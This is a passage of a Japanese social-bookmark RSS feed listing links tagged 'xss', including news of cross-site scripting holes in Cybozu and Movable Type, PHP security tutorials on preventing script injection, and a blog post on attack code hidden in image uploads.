	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/hasegawayosuke/20070404/p1</dc:source>
 <dc:identifier>69467</dc:identifier>
 <dc:creator>CL</dc:creator>
 <dc:date>2007-11-02T08:01:18Z</dc:date>
 <dc:subject>ie</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>jsonp</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ie"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/jsonp"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20401818%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E8%A3%BD%E5%93%81%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>サイボウズ製品にクロスサイトスクリプティングの脆弱性:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20401818%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E8%A3%BD%E5%93%81%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       サイボウズ製品にクロスサイトスクリプティングの脆弱性:ニュース - CNET JapanCNET JapanCNET_IDメールマガジンフィードサイトマップトップニュース特集オピニオンブログホワイトペーパーリサーチベンチャーレビューモバイル...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20401818,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20401818%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BA%E8%A3%BD%E5%93%81%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20401818,00.htm</dc:source>
 <dc:identifier>1635459</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-10-19T16:37:13Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>cybozu</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/cybozu"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0007&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC7%E5%9B%9E%E3%80%80%E3%81%84%E3%81%BE%E3%81%95%E3%82%89%E3%81%AA%E3%81%8C%E3%82%89%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E5%9F%BA%E7%A4%8E%E3%81%AE%E5%9F%BA%E7%A4%8E%EF%BD%9Cgihyo.jp">
 <title>なぜPHPアプリにセキュリティホールが多いのか?：第7回　いまさらながらクロスサイトスクリプティングの基礎の基礎｜gihyo.jp</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0007&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC7%E5%9B%9E%E3%80%80%E3%81%84%E3%81%BE%E3%81%95%E3%82%89%E3%81%AA%E3%81%8C%E3%82%89%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E5%9F%BA%E7%A4%8E%E3%81%AE%E5%9F%BA%E7%A4%8E%EF%BD%9Cgihyo.jp</link>
 
  
   <description>
     <![CDATA[
        gihyo.jp &raquo; DEVELOPER STAGE &raquo; 連載 &raquo; なぜPHPアプリにセキュリティホールが多いのか? &raquo; 第7回　いまさらながらクロスサイトスクリプティングの基礎の基礎なぜPHPアプリにセキュリティホールが多いのか?第7回　いまさらながらクロスサイトスクリプティングの基礎の基礎2007年7月23日 大垣靖男 プログラミング, PHP, セキュリティ今回はWebアプリケーションを作ったことがない方でも分かるようクロスサイトスクリプティング脆弱性を解説します。クロスサイトスクリプティングとは？初めてクロスサイトスクリプティングと聞いて，どのような問題なのかすぐに理解できる人はいないと思います。サイトAに記述されたJavaScriptプログラムがサイトB上で実行されるために発生することが問題とされたので，「サイト間をまたがるスクリプトの実行」問題として，クロスサイトスクリプティング（XSS）と名前が付けられました。この命名では直感的に分かりづらい，サイト間にまたがらずHTMLメールなどにJavaScriptを挿入する攻撃でも同じ効果が得られることから...
       <a href="http://gihyo.jp/dev/serial/01/php-security/0007">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0007&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC7%E5%9B%9E%E3%80%80%E3%81%84%E3%81%BE%E3%81%95%E3%82%89%E3%81%AA%E3%81%8C%E3%82%89%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E5%9F%BA%E7%A4%8E%E3%81%AE%E5%9F%BA%E7%A4%8E%EF%BD%9Cgihyo.jp">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://gihyo.jp/dev/serial/01/php-security/0007</dc:source>
 <dc:identifier>157251</dc:identifier>
 <dc:creator>eclipse-a</dc:creator>
 <dc:date>2007-09-27T12:02:39Z</dc:date>
 <dc:subject>php</dc:subject>
 <dc:subject>セキュリティ</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/php"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20392398%2C00.htm&amp;title=Movable%20Type%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>Movable Typeにクロスサイトスクリプティングの脆弱性:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20392398%2C00.htm&amp;title=Movable%20Type%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       Movable Typeにクロスサイトスクリプティングの脆弱性:ニュース - CNET JapanCNET JapanCNET_IDメールマガジンフィードサイトマップトップニュース特集オピニオンブログホワイトペーパーリサーチベンチャーレビューモバイルマーケティングアップル■ 経営一般■ 情報システム...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20392398,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20392398%2C00.htm&amp;title=Movable%20Type%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20392398,00.htm</dc:source>
 <dc:identifier>858945</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-04-27T11:05:02Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>movabletype</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/movabletype"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.tokumaru.org%2Fd%2F20070807.html&amp;title=%E5%BE%B3%E4%B8%B8%E6%B5%A9%E3%81%AE%E6%97%A5%E8%A8%98%20-%20mod_imagefight%E8%80%83%20-%20%E7%94%BB%E5%83%8F%E7%89%88%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA%E8%A8%80%E3%81%86%E3%81%AA">
 <title>徳丸浩の日記 - mod_imagefight考 - 画像版サニタイズ言うな</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.tokumaru.org%2Fd%2F20070807.html&amp;title=%E5%BE%B3%E4%B8%B8%E6%B5%A9%E3%81%AE%E6%97%A5%E8%A8%98%20-%20mod_imagefight%E8%80%83%20-%20%E7%94%BB%E5%83%8F%E7%89%88%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA%E8%A8%80%E3%81%86%E3%81%AA</link>
 
  
   <description>
     <![CDATA[
       <br />[PR] 留学トップ&laquo;前の日記(2007-07-31)最新次の日記(2007-08-21)&raquo;編集過去の日記2007-122007-112007-092007-082007-072007-062007-052007-08-07 mod_imagefight考● 画像版サニタイズ言うな しばらく前から、竹迫さんのイメージファイト(mod_imagefight)が、第10回セキュリティもみじセミナーなとで発表され話題になっていましたが、LL魂で発表されたプレゼン資料が公開されましたので、私もようやく内容を見させていただきました。先日、PHPの攻撃コードが隠された画像ファイルが、大手ホスティングサイトで発見されたとの報道がなされました。GIF,PNG,JPEG,BMP形式の画像ファイルには、PHPのRFI攻撃で使用されるコードやJavaScriptのソースなどを埋め込むことができます。画像に埋め込まれた攻撃コードと戦う5つの方法について解説し、安全な画像アップローダの実装について考察します。 [TAKESAKO @ Yet another Cybozu Labs: LL魂お疲れ様でした[LLS...
       <a href="http://www.tokumaru.org/d/20070807.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.tokumaru.org%2Fd%2F20070807.html&amp;title=%E5%BE%B3%E4%B8%B8%E6%B5%A9%E3%81%AE%E6%97%A5%E8%A8%98%20-%20mod_imagefight%E8%80%83%20-%20%E7%94%BB%E5%83%8F%E7%89%88%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA%E8%A8%80%E3%81%86%E3%81%AA">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.tokumaru.org/d/20070807.html</dc:source>
 <dc:identifier>118140</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2007-08-07T15:46:27Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>rfi</dc:subject>
 <dc:subject>inclusionattack</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/rfi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/inclusionattack"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070401%2F267074%2F&amp;title=%E3%81%AF%E3%81%B3%E3%81%93%E3%82%8B%E3%80%8C%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E7%B3%BB%E3%80%8D%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%EF%BC%9AITpro">
 <title>はびこる「インジェクション系」のぜい弱性：ITpro</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070401%2F267074%2F&amp;title=%E3%81%AF%E3%81%B3%E3%81%93%E3%82%8B%E3%80%8C%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E7%B3%BB%E3%80%8D%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%EF%BC%9AITpro</link>
 
  
   <description>
     <![CDATA[
       <br /><br />セキュリティ・ホール＆ウイルスCSIRTフォーラムWebの脅威 <br />　ITpro ＞ セキュリティITproの最新ニュースを<br />RSSで配信しています『Windows Server 2008』の<br />最新技術，管理/活用情報はこちら<br />狙われるWebアプリケーション<br />はびこる「インジェクション系」のぜい弱性<br />狙われるWe...
       <a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20070401/267074/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070401%2F267074%2F&amp;title=%E3%81%AF%E3%81%B3%E3%81%93%E3%82%8B%E3%80%8C%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E7%B3%BB%E3%80%8D%E3%81%AE%E3%81%9C%E3%81%84%E5%BC%B1%E6%80%A7%EF%BC%9AITpro">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://itpro.nikkeibp.co.jp/article/COLUMN/20070401/267074/</dc:source>
 <dc:identifier>69278</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-04-05T08:07:57Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>sql</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>injection</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/sql"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/injection"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fq.hatena.ne.jp%2F1170218497&amp;title=%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%20-%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6%E3%81%AE%E8%B3%AA%E5%95%8F%E3%81%A7%E3%81%99%E3%80%82%20http%3A%2F%2Fhamachiya.com%2Fjunk%2Fxss.html%20xss%E3%81%8C%E5%AE%9F%E8%A1%8C%E3%81%95%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%82%89%E3%81%97%E3%81%84%E3%81%AE%E3%81%A7%E3%81%99%E3%81%8C%E3%80%81%E4%BD%95%E3%81%8C%E8%A1%8C%E3%82%8F%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%81%AE%E3%81%8B%E3%80%81%E3%82%88%E3%81%8F%E5%88%86%E3%81%8B%E3%82%8A%E3%81%BE%E3%81%9B%E3%82%93%E3%80%82..">
 <title>人力検索はてな - クロスサイトスクリプティングについての質問です。 http://hamachiya.com/junk/xss.html xssが実行されているらしいのですが、何が行われているのか、よく分かりません。..</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fq.hatena.ne.jp%2F1170218497&amp;title=%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%20-%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6%E3%81%AE%E8%B3%AA%E5%95%8F%E3%81%A7%E3%81%99%E3%80%82%20http%3A%2F%2Fhamachiya.com%2Fjunk%2Fxss.html%20xss%E3%81%8C%E5%AE%9F%E8%A1%8C%E3%81%95%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%82%89%E3%81%97%E3%81%84%E3%81%AE%E3%81%A7%E3%81%99%E3%81%8C%E3%80%81%E4%BD%95%E3%81%8C%E8%A1%8C%E3%82%8F%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%81%AE%E3%81%8B%E3%80%81%E3%82%88%E3%81%8F%E5%88%86%E3%81%8B%E3%82%8A%E3%81%BE%E3%81%9B%E3%82%93%E3%80%82..</link>
 
  
   <description>
     <![CDATA[
                                                                                             質問一覧          質問する          注目の質問          ヘルプ                                         ようこそゲスト さん        ユーザー登録        ログイン            クロスサイトスクリプティングについての質問です。<br />http://hamachiya.com/junk/xss.html<br />xssが実行されているらしいのですが、何が行われているのか、よく分かりません。情報処理推進機構の「講演会受付」という画面が表示されるだけです。詳しく解説していただけないでしょうか。xssに関してはあまり詳しくないです。mine-D あなたも質問に答えられます！ウォッチリストに追加状態：終了  回答数：2 / 20件 回答ポイント：70ポイント登録：2007-01-31 13:41:39 終了：2007-01-31 16:41:38カテゴリー：インターネット ウェ...
       <a href="http://q.hatena.ne.jp/1170218497">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fq.hatena.ne.jp%2F1170218497&amp;title=%E4%BA%BA%E5%8A%9B%E6%A4%9C%E7%B4%A2%E3%81%AF%E3%81%A6%E3%81%AA%20-%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6%E3%81%AE%E8%B3%AA%E5%95%8F%E3%81%A7%E3%81%99%E3%80%82%20http%3A%2F%2Fhamachiya.com%2Fjunk%2Fxss.html%20xss%E3%81%8C%E5%AE%9F%E8%A1%8C%E3%81%95%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%82%89%E3%81%97%E3%81%84%E3%81%AE%E3%81%A7%E3%81%99%E3%81%8C%E3%80%81%E4%BD%95%E3%81%8C%E8%A1%8C%E3%82%8F%E3%82%8C%E3%81%A6%E3%81%84%E3%82%8B%E3%81%AE%E3%81%8B%E3%80%81%E3%82%88%E3%81%8F%E5%88%86%E3%81%8B%E3%82%8A%E3%81%BE%E3%81%9B%E3%82%93%E3%80%82..">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://q.hatena.ne.jp/1170218497</dc:source>
 <dc:identifier>52694</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-01-31T07:39:24Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>ipa</dc:subject>
 <dc:subject>hamachi</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ipa"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hamachi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0011&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC11%E5%9B%9E%E3%80%80%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%92%E9%98%B2%E3%81%9010%E3%81%AETips%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE">
 <title>なぜPHPアプリにセキュリティホールが多いのか?：第11回　スクリプトインジェクションを防ぐ10のTips｜gihyo.jp … 技術評論社</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0011&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC11%E5%9B%9E%E3%80%80%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%92%E9%98%B2%E3%81%9010%E3%81%AETips%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE</link>
 
  
   <description>
     <![CDATA[
        gihyo.jp &raquo; DEVELOPER STAGE &raquo; 連載 &raquo; なぜPHPアプリにセキュリティホールが多いのか? &raquo; 第11回　スクリプトインジェクションを防ぐ10のTipsなぜPHPアプリにセキュリティホールが多いのか?第11回　スクリプトインジェクションを防ぐ10のTips2007年12月17日 大垣靖男 PHP, セキュリティ, プログラミング前回はスクリプトインジェクションがなくならない理由を紹介しました。それをふまえて今回はスクリプトインジェクションを防ぐ10のTipsを紹介します。デフォルト文字エンコーディングを指定php.iniには，PHPが生成した出力の文字エンコーディングをHTTPヘッダで指定するdefault_charsetオプションがあります。文字エンコーディングは必ずHTTPヘッダレベルで指定しなければなりません。しかし，デフォルト設定ではdefault_charsetが空の状態で，アプリケーションで設定しなければ，HTTPヘッダでは文字エンコーディングが指定されない状態になります。HTTPヘッダで文字エンコーディングを指定しない場...
       <a href="http://gihyo.jp/dev/serial/01/php-security/0011">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Fphp-security%2F0011&amp;title=%E3%81%AA%E3%81%9CPHP%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AB%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%AB%E3%81%8C%E5%A4%9A%E3%81%84%E3%81%AE%E3%81%8B%3F%EF%BC%9A%E7%AC%AC11%E5%9B%9E%E3%80%80%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%92%E9%98%B2%E3%81%9010%E3%81%AETips%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://gihyo.jp/dev/serial/01/php-security/0011</dc:source>
 <dc:identifier>214635</dc:identifier>
 <dc:creator>Daichi</dc:creator>
 <dc:date>2007-12-28T15:31:01Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>php</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
